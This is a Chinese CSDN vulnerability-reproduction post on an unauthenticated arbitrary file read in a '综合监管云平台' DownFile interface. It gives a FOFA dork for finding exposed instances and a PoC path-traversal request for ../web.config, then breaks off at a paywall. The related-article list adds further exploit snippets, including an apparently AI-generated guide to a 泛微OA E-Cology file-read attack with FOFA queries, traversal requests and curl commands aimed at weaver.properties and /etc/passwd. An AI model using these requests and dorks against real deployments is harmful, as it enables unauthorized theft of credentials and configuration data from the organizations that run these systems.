综合监管云平台 DownFile 任意文件读取漏洞复现

0xSecl

已于 2024-07-11 10:23:43 修改

阅读量617

点赞数

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2024-07-11 10:22:44 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/140344366

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

综合监管云平台是一种集成了多种先进技术的信息化平台，旨在通过数据采集、分析、预警和应急处理等功能，实现对各类监管对象的全面、高效、精准管理，综合监管云平台利用“互联网+物联网”模式，结合云计算、大数据、边缘计算等先进技术，构建了一个集数据采集、统计分析、监管预警、应急安全等功能于一体的信息化监管平台。该平台通过远程实时数据采集技术，实现对监管对象的实时监控和动态管理，为监管部门提供强有力的技术支持和决策依据。

0x02 漏洞概述

综合监管云平台 DownFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：body="/Download/DownFile?fileName=SetUp.exe"

0x04 漏洞复现

PoC

GET /Download/DownFile?fileName=../web.config HTTP/1.1
Host: your-ip
User-Agent: Mozill

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

【漏洞复现】通达OA inc/package/down.php接口存在未授权访问漏洞附POC

失心少年

11-30

1233

通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。此外，通达OA通过融合不同的信息化资源，打通信息“孤岛”，精细化流程管理，改善管理模式，实现资源的优化配置和高效运转，全面提升企业竞争力。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。漏洞链接：http://127.0.0.1/inc/package/down.php?/cache/org。

智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现

0xSec

08-16

1099

智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

参与评论您还未登录，请先登录后发表或查看评论

42种常见网站漏洞，让你水得快速，水得专业

jennycisp的博客

06-24

1158

漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞。漏洞挖掘是信息安全领域的一项重要工作，可以帮助企业和组织提高系统的安全性，避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤：确定目标：确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息：收集有关目标的信息，包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞：通过手动和自动化技术进行漏洞分析，识别潜在的漏洞类型和攻击面。

海康威视iSecure-Center 综合安防管理平台 download 任意文件读取漏洞

WuYSec的博客

06-12

974

海康威视iSecure-Center综合安防管理平台是一款“集成化”、“智能化”的平台，能够接入视频监控、一卡通、停车场、报警检测等系统设备。通过海康威视的集成化综合管理软件平台，可以对接入的视频监控点进行集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure-Center综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞，可通过此漏洞读取任意文件。

综合监管云平台存在信息泄露漏洞_中科智远综合监管云平台

wholeliubei的博客

08-19

770

实战！银河麒麟 KYSEC 安全中心执行控制高级配置指南

鹏大圣运维

04-25

702

在信创环境下，为了提升系统安全性，银河麒麟内置了 KYSEC 安全标签系统，通过执行控制（exectl）机制，我们可以对脚本、应用程序进行可信授权、白名单控制，防止恶意程序运行。银河麒麟操作系统的 KYSEC 安全中心提供了强大的执行控制能力，既支持图形化设置，也支持命令行批量管理，是信创场景下提升操作系统主动防护能力的重要工具。在默认配置下，当你执行一个普通脚本（例如 test.sh）时，系统会弹出安全中心的授权对话框，要求确认“是否允许执行”。就需要通过高级配置来提前授信，设置执行控制标签。

LibrePhotos本地部署打造个人云相册安全存储和分享家庭照片(1)

YYDsis的博客

04-24

1124

手机里塞满了珍贵回忆，却担心一不小心就被偷看？别怕，今天我就教你一个绝招——使用自建私有云相册。这不仅比Google Photos更安全可控，还无需公网IP或域名，因为咱们有cpolar这个神器来帮忙打通内网壁垒！跟着我一起，让你的照片管理从此变得既酷又安全吧！

SMB协议

m0_68037567的博客

04-22

569

SMB是用于局域网内资源共享的协议，支持文件传输、打印机访问和进程间通信，常见于Windows系统（如Windows共享文件夹）。使用Wireshark抓包，分析SMB流量中的异常请求（如畸形数据包、高频连接）。：攻击者截获SMB认证流量（NTLM哈希），并中继到其他服务器，冒充合法用户。部署IPS/IDS，配置规则检测SMB攻击流量（如Suricata规则）。：攻击者利用未修复的SMB漏洞（如CVE-2017-0144）。：攻击者通过SMB在内网传播恶意软件（如勒索软件、蠕虫）。

嵌入式软件测试的革新：如何用深度集成工具破解效率与安全的双重困局？

fzm5298的博客

04-22

836

某工业机器人厂商将winAMS的CSV测试集与Simulink生成的预期输出对比，发现了PID控制算法中一个累积误差未被清零的缺陷，该问题在仿真环境中因浮点精度差异始终未被察觉。或许，这就是为什么一位资深工程师在技术论坛中这样评价：“用了winAMS后，我们终于不用在深夜手动补测试用例了——它像一位沉默的搭档，默默扛起了那些重复却至关重要的工作。某国内新能源车企的测试团队反馈，通过winAMS的路径分析功能，他们发现某电机控制函数在低温条件下的一个异常分支未被覆盖，成功避免了潜在的车载控制器死机风险。

了解低功耗蓝牙中的安全密钥

技术超强的网络安全平台

04-24

1140

如果生成的签名与附加到数据的签名匹配，则确认数据的完整性和真实性。这就像一封信被一个独特的蜡封封住一样——当设备接收到数据时，它会检查蜡封，如果匹配，它就知道数据是真实的，没有被篡改过。在深入研究低功耗蓝牙 (LE) 技术如何使用安全密钥（图 1）的具体细节之前，让我们先回顾一下，通过了解安全密钥是什么来奠定基础，特别是对于那些刚刚进入有趣的密码学世界的人来说。因此，解析结果成功。身份地址是一个唯一的、恒定的地址，可以是公开的（在制造过程中分配），也可以是静态的（随机选择，但在设备重启后保持不变）。

XML&XXE 安全&无回显方案&OOB 盲注&DTD 外部实体&黑白盒挖掘

2302_80396242的博客

04-21

552

的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网扫描、攻击内网等危。不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成。选）、文档元素，其焦点是数据的内容，其把数据从。被设计为传输和存储数据，其焦点是数据的内容。类型或数据传输类型，均可尝试修改后提交测试。被设计用来显示数据，其焦点是数据的外观。、可通过应用功能追踪代码定位审计。、可通过脚本特定函数搜索定位审计。、可通过伪协议玩法绕过相关修复等。分离，是独立于软件和硬件的。被设计为传输和存储数据，输入时，没禁止外部实体。

拆解大模型“越狱”攻击：对抗样本如何撕开AI安全护栏？

2301_80552914的博客

04-23

562

该文章首发于奇安信攻防社区：https://forum.butian.net/share/4254。

CmStick & CmStick ME｜精工品质与工业级安全的加密狗之选[特殊字符][特殊字符]

dolazou的专栏

04-21

474

在需要长期、稳定、高安全运行的软件授权场景中，德国威步推出的 CmStick 加密锁，以其精致结构与强大安全性能，成为全球软件开发者与设备制造商的信赖之选。

退役淘汰的硬盘数据安全处置不可忽视-硬盘数据抹除清零

2501_91366856的博客

04-21

1043

在信息化时代，硬盘作为数据存储的核心载体，其退役处理直接关系到信息安全，淘汰硬盘中往往留存大量敏感信息，因此，建立规范的硬盘数据销毁机制至关重要。

安全与智能双加持，Coremail XT6解锁高效办公密码

a1235824的博客

04-23

685

针对用户在第三方客户端登录的场景，Coremail也充分考虑，提出灵活的客户端专用密码策略。由Coremail完全自主研发的XT6邮件系统，经过26年的深入研发和完善，系统技术成熟，性能稳定高效，在党政、金融、教育、医疗、能源、运输等多行业近800家企事业顺利运行，并得到广泛认可，成为当前市场邮件系统可靠之选。在数字化浪潮席卷全球的当下，网络安全已然成为数字中国建设的重要基础，是保障数字经济安全的关键内容，更是推动国家安全体系和能力现代化建设的必要条件，而邮件安全正是网络安全中至关重要的一环。

短信验证码安全实战：三网API+多语言适配开发指南

APIsmileJ的博客

04-22

833

万维易源的“三网短信验证码”API为开发者和企业提供了一个高效、便捷的工具，可以通过简单的接口调用提交自定义签名给运营商审核。通过该API，可以快速创建并提交签名，适用于短信通知、验证信息等多种场景。

施工安全巡检二维码制作

最新发布

Fanerma121的博客

04-25

232

凡尔码系统还支持管理人员下发巡检任务，可以制定巡检计划、选择定时巡检，系统按照巡检计划生成巡检任务，通知人员按时巡检，避免漏检。针对巡检中发现的问题，可以下发任务给对应人员，从而形成工作流程，从整改到验收，都需要填写情况、上传图片或视频、备注整改和检查人员，形成工作有痕，追责有人的严格巡检闭环。在巡检过程中，工作人员可以通过扫描二维码进入，填写巡检记录现场可拍照、视频、情况录入巡检信息，系统还支持设置定时定位、水印照片等功能防止假检。巡检数据也会实时回传到后台，管理人员通过平台就可以查看到巡检情况。

【安全扫描器原理】TCP/IP协议编程

大河之犬的博客

04-25

241

TCP/IP协议是目前网络中使用最广泛的协议，Socket称为“套接口”，最早出现在Berkeley Unix中，最初只支持TCP/IP协议族和Unix协议，现在它已支持很多协议，是最重要的网络编程接口1、端口（Port）和套接口端口正是我们要扫描的对象，具有“开”和“关”两种状态，利用它的开或关状态就可以初步判断一台主机是否提供了某种服务和端口所在主机的IP地址结合起来，所形成的一个二元组（IP地址，端口地址）就组成了一个套接口。

“多模态SCA+DevSecOps+SBOM风险情报预警 “数字供应链安全最佳管理体系！悬镜安全如何用AI守护万亿数字中国？

weixin_64810147的博客

04-22

711

从开发源头规避风险，在运行时动态拦截威胁。‌“安全左移，敏捷右移”‌！中关村软件园企业——悬镜安全首创专利级“AI智能代码疫苗技术”破解了这一难题，重新定义代码安全防护的边界。

泛微OA-E-Cology-FileDownload文件读取漏洞测试背景

03-30

<think>好的，我需要回答用户关于泛微OA E-Cology FileDownload文件读取漏洞的测试方法和背景的问题。首先，我需要回顾用户提供的三个引用内容，从中提取关键信息。用户提到的漏洞是泛微OA的ln.FileDownload接口存在任意文件读取漏洞。攻击者可以通过构造特定请求来读取服务器上的敏感文件，可能导致数据泄露。引用中提到了网络测绘的语法，比如使用Fofa搜索app="泛微-OA（e-cology）"，这可能帮助识别存在漏洞的系统。接下来，测试方法部分需要详细说明如何复现该漏洞。根据引用中的复现步骤，可能需要构造一个HTTP GET请求，其中包含文件路径参数。例如，通过访问类似/downfile.jsp?filename=../ecology/WEB-INF/prop/weaver.properties的URL，尝试读取配置文件。此外，用户可能需要使用工具如Burp Suite或curl来发送请求，并检查响应内容是否包含敏感信息。关于背景部分，需要说明泛微OA E-Cology的应用场景和漏洞的影响。该OA系统面向中大型组织，用于协同办公，因此漏洞的存在会威胁到企业的重要数据。漏洞成因可能是接口未对用户输入进行严格过滤，允许目录遍历攻击。在信息安全方面，需要强调漏洞的严重性，比如未经授权的访问可能导致敏感信息泄露，影响企业运营和客户隐私。漏洞分析部分应指出接口设计中的缺陷，例如缺乏参数校验或权限验证。最后，生成相关问题需要考虑用户可能进一步想知道的内容，如修复建议、影响范围、检测工具等。需要确保问题覆盖漏洞的不同方面，帮助用户全面了解。需要检查是否所有数学公式都正确使用了$...$或$$...$$格式，但由于当前主题不涉及数学内容，可能不需要处理。但需注意用户提到的系统级指令中的格式要求，确保回答结构清晰，引用标识正确添加。同时，回答要使用中文，保持自然流畅。</think>### 泛微OA E-Cology FileDownload文件读取漏洞分析 #### 漏洞背景泛微OA E-Cology是一款面向中大型组织的协同办公系统，其核心功能包括流程管理、文档协作等[^3]。漏洞存在于`ln.FileDownload`接口中，攻击者可通过构造恶意请求绕过权限校验，直接读取服务器上的任意文件（如配置文件、数据库凭证、日志文件等）。此类漏洞通常因接口未对用户输入的路径参数进行安全过滤或权限校验导致[^1][^2]。 #### 测试方法 1. **环境识别** 使用网络测绘工具（如Fofa、Hunter）搜索目标系统： ```text app="泛微-OA（e-cology）" 或 app.name="泛微 e-cology OA" ``` 2. **漏洞验证** 构造HTTP请求尝试读取敏感文件（以`weaver.properties`为例）： ```http GET /downfile.jsp?filename=../ecology/WEB-INF/prop/weaver.properties HTTP/1.1 Host: <目标IP或域名> ``` 若响应中包含数据库连接信息（如`jdbc:mysql://`），则漏洞存在[^1]。 3. **工具辅助** - 使用**Burp Suite**拦截请求并修改参数测试路径遍历（如`filename=../../etc/passwd`）。 - 通过**curl命令**批量测试敏感文件路径： ```bash curl -v "http://目标地址/downfile.jsp?filename=../WEB-INF/web.xml" ``` #### 信息安全影响 1. **数据泄露风险** 攻击者可获取`WEB-INF`目录下的配置文件（如`weaver.properties`），进而窃取数据库账号、密钥等敏感信息。 2. **系统渗透入口** 泄露的日志文件可能包含服务器内部路径或调试信息，为后续攻击（如代码执行）提供线索。 #### 漏洞成因分析 1. **路径过滤缺失** `filename`参数未对`../`等目录遍历符号进行过滤，导致攻击者可跨目录读取文件。 2. **权限校验不足** 接口未验证用户身份或会话权限，允许未授权访问。 ---